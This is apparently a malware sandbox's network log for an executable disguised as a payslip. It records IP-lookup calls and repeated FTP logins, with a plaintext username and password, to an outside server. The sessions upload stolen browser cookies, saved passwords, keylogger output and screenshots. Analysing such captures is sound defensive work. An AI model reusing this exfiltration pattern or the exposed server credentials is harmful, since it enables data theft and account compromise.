                                                                                                          Nov 4, 2024 21:28:53.492291927 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.493091106 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.493171930 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.497436047 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.497457981 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.497503996 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.497514963 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.497833967 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.497893095 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.498226881 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.498295069 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.498435974 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.498445988 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.498584986 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.499067068 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.499628067 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.499671936 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.586764097 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:54.331672907 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:54.496790886 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:29:03.609679937 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:29:03.614762068 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:29:03.959089041 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:29:03.959532976 CET5004760390192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:29:03.964752913 CET6039050047110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:29:03.964875937 CET5004760390192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:29:03.964960098 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:29:03.970962048 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:29:04.867230892 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:29:04.914922953 CET4973521192.168.2.4110.4.45.197
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 4, 2024 21:24:55.516026020 CET | 53050 | 53 | 192.168.2.4 | 1.1.1.1
Nov 4, 2024 21:24:55.523209095 CET | 53 | 53050 | 1.1.1.1 | 192.168.2.4
Nov 4, 2024 21:24:56.901248932 CET | 62205 | 53 | 192.168.2.4 | 1.1.1.1
Nov 4, 2024 21:24:57.171571016 CET | 53 | 62205 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 4, 2024 21:24:55.516026020 CET | 192.168.2.4 | 1.1.1.1 | 0x7565 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Nov 4, 2024 21:24:56.901248932 CET | 192.168.2.4 | 1.1.1.1 | 0xe40c | Standard query (0) | ftp.haliza.com.my | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 4, 2024 21:24:55.523209095 CET | 1.1.1.1 | 192.168.2.4 | 0x7565 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 21:24:55.523209095 CET | 1.1.1.1 | 192.168.2.4 | 0x7565 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 21:24:55.523209095 CET | 1.1.1.1 | 192.168.2.4 | 0x7565 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 21:24:57.171571016 CET | 1.1.1.1 | 192.168.2.4 | 0xe40c | No error (0) | ftp.haliza.com.my | | 110.4.45.197 | A (IP address) | IN (0x0001) | false

                                                                                                          • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 104.26.12.205 | 443 | 7692 | C:\Users\user\Desktop\Payslip_October_2024.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-04 20:24:56 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-11-04 20:24:56 UTC | 399 | IN | HTTP/1.1 200 OK
Date: Mon, 04 Nov 2024 20:24:56 GMT
Content-Type: text/plain
Content-Length: 14
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8dd75497bd48699a-DFW
server-timing: cfL4;desc="?proto=TCP&rtt=1323&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2285714&cwnd=248&unsent_bytes=0&cid=e98b30be497a1c8f&ts=249&x=0"
2024-11-04 20:24:56 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39
Data Ascii: 173.254.250.69


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 104.26.12.205 | 443 | 8008 | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-04 20:25:08 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-11-04 20:25:09 UTC | 399 | IN | HTTP/1.1 200 OK
Date: Mon, 04 Nov 2024 20:25:09 GMT
Content-Type: text/plain
Content-Length: 14
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8dd754e77ab82cc1-DFW
server-timing: cfL4;desc="?proto=TCP&rtt=1422&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2026592&cwnd=247&unsent_bytes=0&cid=42a88fb69f4b05cf&ts=237&x=0"
2024-11-04 20:25:09 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39
Data Ascii: 173.254.250.69


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49750 | 104.26.12.205 | 443 | 6128 | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-04 20:25:18 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-11-04 20:25:18 UTC | 399 | IN | HTTP/1.1 200 OK
Date: Mon, 04 Nov 2024 20:25:18 GMT
Content-Type: text/plain
Content-Length: 14
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8dd75522cfaee5a9-DFW
server-timing: cfL4;desc="?proto=TCP&rtt=1224&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2500863&cwnd=240&unsent_bytes=0&cid=27fae0df9f3864a9&ts=662&x=0"
2024-11-04 20:25:18 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39
Data Ascii: 173.254.250.69


                                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                          Nov 4, 2024 21:24:58.145982981 CET2149735110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 04:24. Server port: 21.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 04:24. Server port: 21.220-This is a private system - No anonymous login
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 04:24. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 04:24. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                          Nov 4, 2024 21:24:58.149497032 CET4973521192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                                                                          Nov 4, 2024 21:24:58.498543024 CET2149735110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                                                                          Nov 4, 2024 21:24:58.498661041 CET4973521192.168.2.4110.4.45.197PASS JesusChrist007$
                                                                                                          Nov 4, 2024 21:24:58.877778053 CET2149735110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                                                                          Nov 4, 2024 21:24:59.228914022 CET2149735110.4.45.197192.168.2.4504 Unknown command
                                                                                                          Nov 4, 2024 21:24:59.229027987 CET4973521192.168.2.4110.4.45.197PWD
                                                                                                          Nov 4, 2024 21:24:59.579032898 CET2149735110.4.45.197192.168.2.4257 "/" is your current location
                                                                                                          Nov 4, 2024 21:24:59.579164982 CET4973521192.168.2.4110.4.45.197TYPE I
                                                                                                          Nov 4, 2024 21:24:59.928574085 CET2149735110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                                                                          Nov 4, 2024 21:24:59.928759098 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:25:00.277859926 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,192,87)
                                                                                                          Nov 4, 2024 21:25:00.285343885 CET4973521192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-724536_2024_11_04_15_44_56.txt
                                                                                                          Nov 4, 2024 21:25:01.185388088 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:25:01.533375978 CET2149735110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.348 seconds (measured here), 9.41 Kbytes per second
                                                                                                          Nov 4, 2024 21:25:01.533736944 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:25:01.884216070 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,249,245)
                                                                                                          Nov 4, 2024 21:25:01.889717102 CET4973521192.168.2.4110.4.45.197STOR CO_Firefox_fqs92o4p.default-release.txt_user-724536_2024_11_04_21_53_28.txt
                                                                                                          Nov 4, 2024 21:25:02.811544895 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:25:03.163824081 CET2149735110.4.45.197192.168.2.4226 File successfully transferred
Nov 4, 2024 21:25:11.196496010 CET  21  49741  110.4.45.197  192.168.2.4  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 10 of 50 allowed.
    220-Local time is now 04:25. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Nov 4, 2024 21:25:11.206302881 CET  49741  21  192.168.2.4  110.4.45.197  USER origin@haliza.com.my
Nov 4, 2024 21:25:11.551081896 CET  21  49741  110.4.45.197  192.168.2.4  331 User origin@haliza.com.my OK. Password required
Nov 4, 2024 21:25:11.551650047 CET  49741  21  192.168.2.4  110.4.45.197  PASS JesusChrist007$
Nov 4, 2024 21:25:11.926958084 CET  21  49741  110.4.45.197  192.168.2.4  230 OK. Current restricted directory is /
Nov 4, 2024 21:25:12.271320105 CET  21  49741  110.4.45.197  192.168.2.4  504 Unknown command
Nov 4, 2024 21:25:12.271470070 CET  49741  21  192.168.2.4  110.4.45.197  PWD
Nov 4, 2024 21:25:12.627825975 CET  21  49741  110.4.45.197  192.168.2.4  257 "/" is your current location
Nov 4, 2024 21:25:12.628004074 CET  49741  21  192.168.2.4  110.4.45.197  TYPE I
Nov 4, 2024 21:25:12.971760988 CET  21  49741  110.4.45.197  192.168.2.4  200 TYPE is now 8-bit binary
Nov 4, 2024 21:25:12.971892118 CET  49741  21  192.168.2.4  110.4.45.197  PASV
Nov 4, 2024 21:25:13.316006899 CET  21  49741  110.4.45.197  192.168.2.4  227 Entering Passive Mode (110,4,45,197,203,242)
Nov 4, 2024 21:25:13.322096109 CET  49741  21  192.168.2.4  110.4.45.197  STOR PW_user-724536_2024_11_04_15_25_09.html
Nov 4, 2024 21:25:14.233009100 CET  21  49741  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:25:14.812055111 CET  21  49741  110.4.45.197  192.168.2.4  226-File successfully transferred
    226 0.346 seconds (measured here), 0.98 Kbytes per second
Nov 4, 2024 21:25:14.813723087 CET  21  49741  110.4.45.197  192.168.2.4  226-File successfully transferred
    226 0.346 seconds (measured here), 0.98 Kbytes per second
Nov 4, 2024 21:25:15.089061975 CET  49741  21  192.168.2.4  110.4.45.197  PASV
Nov 4, 2024 21:25:15.433594942 CET  21  49741  110.4.45.197  192.168.2.4  227 Entering Passive Mode (110,4,45,197,251,201)
Nov 4, 2024 21:25:15.439353943 CET  49741  21  192.168.2.4  110.4.45.197  STOR CO_Chrome_Default.txt_user-724536_2024_11_04_21_43_50.txt
Nov 4, 2024 21:25:17.385520935 CET  21  49741  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:25:17.385582924 CET  21  49741  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:25:17.385813951 CET  21  49741  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:25:17.386035919 CET  21  49741  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:25:20.177556992 CET  21  49751  110.4.45.197  192.168.2.4  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 10 of 50 allowed.
    220-Local time is now 04:25. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Nov 4, 2024 21:25:20.180557966 CET  49751  21  192.168.2.4  110.4.45.197  USER origin@haliza.com.my
Nov 4, 2024 21:25:20.532474995 CET  21  49751  110.4.45.197  192.168.2.4  331 User origin@haliza.com.my OK. Password required
Nov 4, 2024 21:25:20.536825895 CET  49751  21  192.168.2.4  110.4.45.197  PASS JesusChrist007$
Nov 4, 2024 21:25:20.914602041 CET  21  49751  110.4.45.197  192.168.2.4  230 OK. Current restricted directory is /
Nov 4, 2024 21:25:21.268820047 CET  21  49751  110.4.45.197  192.168.2.4  504 Unknown command
Nov 4, 2024 21:25:21.269021988 CET  49751  21  192.168.2.4  110.4.45.197  PWD
Nov 4, 2024 21:25:21.639569998 CET  21  49751  110.4.45.197  192.168.2.4  257 "/" is your current location
Nov 4, 2024 21:25:21.639883041 CET  49751  21  192.168.2.4  110.4.45.197  TYPE I
Nov 4, 2024 21:25:21.991764069 CET  21  49751  110.4.45.197  192.168.2.4  200 TYPE is now 8-bit binary
Nov 4, 2024 21:25:21.992010117 CET  49751  21  192.168.2.4  110.4.45.197  PASV
Nov 4, 2024 21:25:22.344014883 CET  21  49751  110.4.45.197  192.168.2.4  227 Entering Passive Mode (110,4,45,197,214,32)
Nov 4, 2024 21:25:22.350302935 CET  49751  21  192.168.2.4  110.4.45.197  STOR PW_user-724536_2024_11_04_15_25_18.html
Nov 4, 2024 21:25:23.295093060 CET  21  49751  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:25:23.654500961 CET  21  49751  110.4.45.197  192.168.2.4  226-File successfully transferred
    226 0.358 seconds (measured here), 0.95 Kbytes per second
Nov 4, 2024 21:25:23.678637981 CET  49751  21  192.168.2.4  110.4.45.197  PASV
Nov 4, 2024 21:25:24.031280041 CET  21  49751  110.4.45.197  192.168.2.4  227 Entering Passive Mode (110,4,45,197,232,48)
Nov 4, 2024 21:25:24.037296057 CET  49751  21  192.168.2.4  110.4.45.197  STOR CO_Chrome_Default.txt_user-724536_2024_11_04_22_03_52.txt
Nov 4, 2024 21:25:24.978235006 CET  21  49751  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:25:25.331723928 CET  21  49751  110.4.45.197  192.168.2.4  226-File successfully transferred
    226 0.357 seconds (measured here), 9.17 Kbytes per second
Nov 4, 2024 21:25:25.332184076 CET  49751  21  192.168.2.4  110.4.45.197  PASV
Nov 4, 2024 21:25:25.686129093 CET  21  49751  110.4.45.197  192.168.2.4  227 Entering Passive Mode (110,4,45,197,223,199)
Nov 4, 2024 21:25:25.693078041 CET  49751  21  192.168.2.4  110.4.45.197  STOR CO_Firefox_fqs92o4p.default-release.txt_user-724536_2024_11_05_00_32_35.txt
Nov 4, 2024 21:25:26.639322042 CET  21  49751  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:25:26.984440088 CET  21  49751  110.4.45.197  192.168.2.4  226 File successfully transferred
Nov 4, 2024 21:26:27.785145044 CET  49735  21  192.168.2.4  110.4.45.197  PASV
Nov 4, 2024 21:26:28.134579897 CET  21  49735  110.4.45.197  192.168.2.4  227 Entering Passive Mode (110,4,45,197,226,148)
Nov 4, 2024 21:26:28.140477896 CET  49735  21  192.168.2.4  110.4.45.197  STOR KL_user-724536_2024_11_18_19_04_53.html
Nov 4, 2024 21:26:29.055278063 CET  21  49735  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:26:29.404416084 CET  21  49735  110.4.45.197  192.168.2.4  226-File successfully transferred
    226 0.349 seconds (measured here), 0.80 Kbytes per second
Nov 4, 2024 21:26:32.110491037 CET  49735  21  192.168.2.4  110.4.45.197  PASV
Nov 4, 2024 21:26:32.459836006 CET  21  49735  110.4.45.197  192.168.2.4  227 Entering Passive Mode (110,4,45,197,220,175)
Nov 4, 2024 21:26:32.469227076 CET  49735  21  192.168.2.4  110.4.45.197  STOR SC_user-724536_2024_11_22_21_55_24.jpeg
Nov 4, 2024 21:26:33.367384911 CET  21  49735  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:26:34.121799946 CET  21  49735  110.4.45.197  192.168.2.4  226-File successfully transferred
    226 0.756 seconds (measured here), 97.69 Kbytes per second
Nov 4, 2024 21:26:42.923118114 CET  49735  21  192.168.2.4  110.4.45.197  PASV
Nov 4, 2024 21:26:43.272464037 CET  21  49735  110.4.45.197  192.168.2.4  227 Entering Passive Mode (110,4,45,197,226,141)
Nov 4, 2024 21:26:43.278801918 CET  49735  21  192.168.2.4  110.4.45.197  STOR SC_user-724536_2024_11_29_06_34_55.jpeg
Nov 4, 2024 21:26:44.220077038 CET  21  49735  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:26:45.020203114 CET  21  49735  110.4.45.197  192.168.2.4  226-File successfully transferred
    226 0.800 seconds (measured here), 92.29 Kbytes per second
Nov 4, 2024 21:26:51.670495033 CET  49735  21  192.168.2.4  110.4.45.197  PASV
Nov 4, 2024 21:26:52.019615889 CET  21  49735  110.4.45.197  192.168.2.4  227 Entering Passive Mode (110,4,45,197,238,144)
Nov 4, 2024 21:26:52.025342941 CET  49735  21  192.168.2.4  110.4.45.197  STOR SC_user-724536_2024_12_07_11_23_16.jpeg
Nov 4, 2024 21:26:52.943694115 CET  21  49735  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:26:53.722090960 CET  21  49735  110.4.45.197  192.168.2.4  226-File successfully transferred
    226 0.778 seconds (measured here), 94.93 Kbytes per second
Nov 4, 2024 21:26:56.157516956 CET  49735  21  192.168.2.4  110.4.45.197  PASV
Nov 4, 2024 21:26:56.507267952 CET  21  49735  110.4.45.197  192.168.2.4  227 Entering Passive Mode (110,4,45,197,247,138)
Nov 4, 2024 21:26:56.513139009 CET  49735  21  192.168.2.4  110.4.45.197  STOR SC_user-724536_2024_12_11_14_38_27.jpeg
Nov 4, 2024 21:26:57.422035933 CET  21  49735  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:26:58.176453114 CET  21  49735  110.4.45.197  192.168.2.4  226-File successfully transferred
    226 0.754 seconds (measured here), 97.91 Kbytes per second
Nov 4, 2024 21:27:10.904073954 CET  49735  21  192.168.2.4  110.4.45.197  PASV
Nov 4, 2024 21:27:11.253354073 CET  21  49735  110.4.45.197  192.168.2.4  227 Entering Passive Mode (110,4,45,197,207,5)
Nov 4, 2024 21:27:11.262636900 CET  49735  21  192.168.2.4  110.4.45.197  STOR SC_user-724536_2024_12_19_23_56_34.jpeg
Nov 4, 2024 21:27:12.201129913 CET  21  49735  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:27:12.980257988 CET  21  49735  110.4.45.197  192.168.2.4  226-File successfully transferred
    226 0.775 seconds (measured here), 95.34 Kbytes per second
Nov 4, 2024 21:27:19.153726101 CET  49735  21  192.168.2.4  110.4.45.197  PASV
Nov 4, 2024 21:27:19.517566919 CET  21  49735  110.4.45.197  192.168.2.4  227 Entering Passive Mode (110,4,45,197,194,195)
Nov 4, 2024 21:27:19.523673058 CET  49735  21  192.168.2.4  110.4.45.197  STOR SC_user-724536_2024_12_25_06_21_32.jpeg
Nov 4, 2024 21:27:20.464711905 CET  21  49735  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:27:21.283404112 CET  21  49735  110.4.45.197  192.168.2.4  226-File successfully transferred
    226 0.819 seconds (measured here), 90.20 Kbytes per second
Nov 4, 2024 21:27:28.014493942 CET  21  50034  110.4.45.197  192.168.2.4  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 18 of 50 allowed.
    220-Local time is now 04:27. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Nov 4, 2024 21:27:28.014645100 CET  50034  21  192.168.2.4  110.4.45.197  USER origin@haliza.com.my
Nov 4, 2024 21:27:28.356697083 CET  21  50034  110.4.45.197  192.168.2.4  331 User origin@haliza.com.my OK. Password required
Nov 4, 2024 21:27:28.362658978 CET  50034  21  192.168.2.4  110.4.45.197  PASS JesusChrist007$
Nov 4, 2024 21:27:28.732450962 CET  21  50034  110.4.45.197  192.168.2.4  230 OK. Current restricted directory is /
Nov 4, 2024 21:27:29.074615955 CET  21  50034  110.4.45.197  192.168.2.4  504 Unknown command
Nov 4, 2024 21:27:29.076683044 CET  50034  21  192.168.2.4  110.4.45.197  PWD
Nov 4, 2024 21:27:29.416821957 CET  21  50034  110.4.45.197  192.168.2.4  257 "/" is your current location
Nov 4, 2024 21:27:29.416964054 CET  50034  21  192.168.2.4  110.4.45.197  TYPE I
Nov 4, 2024 21:27:29.757000923 CET  21  50034  110.4.45.197  192.168.2.4  200 TYPE is now 8-bit binary
Nov 4, 2024 21:27:29.757158041 CET  50034  21  192.168.2.4  110.4.45.197  PASV
Nov 4, 2024 21:27:30.097412109 CET  21  50034  110.4.45.197  192.168.2.4  227 Entering Passive Mode (110,4,45,197,212,215)
Nov 4, 2024 21:27:30.108757973 CET  50034  21  192.168.2.4  110.4.45.197  STOR SC_user-724536_2024_12_10_16_48_19.jpeg
Nov 4, 2024 21:27:31.024893999 CET  21  50034  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:27:31.807467937 CET  21  50034  110.4.45.197  192.168.2.4  226-File successfully transferred
    226 0.783 seconds (measured here), 94.35 Kbytes per second
Nov 4, 2024 21:27:42.158437014 CET  50034  21  192.168.2.4  110.4.45.197  PASV
Nov 4, 2024 21:27:42.503351927 CET  21  50034  110.4.45.197  192.168.2.4  227 Entering Passive Mode (110,4,45,197,200,71)
Nov 4, 2024 21:27:42.509063005 CET  50034  21  192.168.2.4  110.4.45.197  STOR SC_user-724536_2024_12_19_02_29_30.jpeg
Nov 4, 2024 21:27:43.494218111 CET  21  50034  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:27:43.695734978 CET  21  50034  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:27:44.300317049 CET  21  50034  110.4.45.197  192.168.2.4  226-File successfully transferred
    226 0.843 seconds (measured here), 87.61 Kbytes per second
Nov 4, 2024 21:27:46.045569897 CET  50034  21  192.168.2.4  110.4.45.197  PASV
Nov 4, 2024 21:27:46.385701895 CET  21  50034  110.4.45.197  192.168.2.4  227 Entering Passive Mode (110,4,45,197,244,4)
Nov 4, 2024 21:27:46.391652107 CET  50034  21  192.168.2.4  110.4.45.197  STOR SC_user-724536_2024_12_24_02_40_35.jpeg
Nov 4, 2024 21:27:47.339618921 CET  21  50034  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:27:59.079837084 CET  49735  21  192.168.2.4  110.4.45.197  PASV
Nov 4, 2024 21:27:59.428966045 CET  21  49735  110.4.45.197  192.168.2.4  227 Entering Passive Mode (110,4,45,197,236,95)
Nov 4, 2024 21:27:59.438764095 CET  49735  21  192.168.2.4  110.4.45.197  STOR SC_user-724536_2025_01_16_09_38_03.jpeg
Nov 4, 2024 21:28:00.356689930 CET  21  49735  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:28:01.145380974 CET  21  49735  110.4.45.197  192.168.2.4  226-File successfully transferred
    226 0.788 seconds (measured here), 93.72 Kbytes per second
Nov 4, 2024 21:28:05.200150967 CET  49735  21  192.168.2.4  110.4.45.197  PASV
Nov 4, 2024 21:28:05.549232960 CET  21  49735  110.4.45.197  192.168.2.4  227 Entering Passive Mode (110,4,45,197,232,224)
Nov 4, 2024 21:28:05.558703899 CET  49735  21  192.168.2.4  110.4.45.197  STOR SC_user-724536_2025_01_20_22_44_01.jpeg
Nov 4, 2024 21:28:06.484287024 CET  21  49735  110.4.45.197  192.168.2.4  150 Accepted data connection
Nov 4, 2024 21:28:07.280531883 CET  21  49735  110.4.45.197  192.168.2.4  226-File successfully transferred
    226 0.797 seconds (measured here), 92.66 Kbytes per second
Nov 4, 2024 21:28:18.235924006 CET  21  50040  110.4.45.197  192.168.2.4  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 13 of 50 allowed.
    220-Local time is now 04:28. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Nov 4, 2024 21:28:18.236058950 CET  50040  21  192.168.2.4  110.4.45.197  USER origin@haliza.com.my
Nov 4, 2024 21:28:18.579554081 CET  21  50040  110.4.45.197  192.168.2.4  331 User origin@haliza.com.my OK. Password required
Nov 4, 2024 21:28:18.579694033 CET  50040  21  192.168.2.4  110.4.45.197  PASS JesusChrist007$
Nov 4, 2024 21:28:18.950798035 CET  21  50040  110.4.45.197  192.168.2.4  230 OK. Current restricted directory is /
Nov 4, 2024 21:28:19.295345068 CET  21  50040  110.4.45.197  192.168.2.4  504 Unknown command
Nov 4, 2024 21:28:19.295480967 CET  50040  21  192.168.2.4  110.4.45.197  PWD
Nov 4, 2024 21:28:19.654599905 CET  21  50040  110.4.45.197  192.168.2.4  257 "/" is your current location
                                                                                                          Nov 4, 2024 21:28:19.654776096 CET5004021192.168.2.4110.4.45.197TYPE I
                                                                                                          Nov 4, 2024 21:28:19.997891903 CET2150040110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                                                                          Nov 4, 2024 21:28:19.998037100 CET5004021192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:28:20.341048002 CET2150040110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,254,4)
                                                                                                          Nov 4, 2024 21:28:20.347642899 CET5004021192.168.2.4110.4.45.197STOR SC_user-724536_2025_01_07_03_20_08.jpeg
                                                                                                          Nov 4, 2024 21:28:21.256980896 CET2150040110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:28:21.468003035 CET2150040110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:28:22.018806934 CET2150040110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.762 seconds (measured here), 96.90 Kbytes per second
                                                                                                          Nov 4, 2024 21:28:22.275010109 CET4973521192.168.2.4110.4.45.197PASV
                                                                                                          Nov 4, 2024 21:28:22.654452085 CET2149735110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,231,20)
                                                                                                          Nov 4, 2024 21:28:22.660265923 CET4973521192.168.2.4110.4.45.197STOR SC_user-724536_2025_01_29_19_06_07.jpeg
                                                                                                          Nov 4, 2024 21:28:23.579749107 CET2149735110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                          Nov 4, 2024 21:28:24.379509926 CET2149735110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                          226-File successfully transferred226 0.800 seconds (measured here), 97.63 Kbytes per second
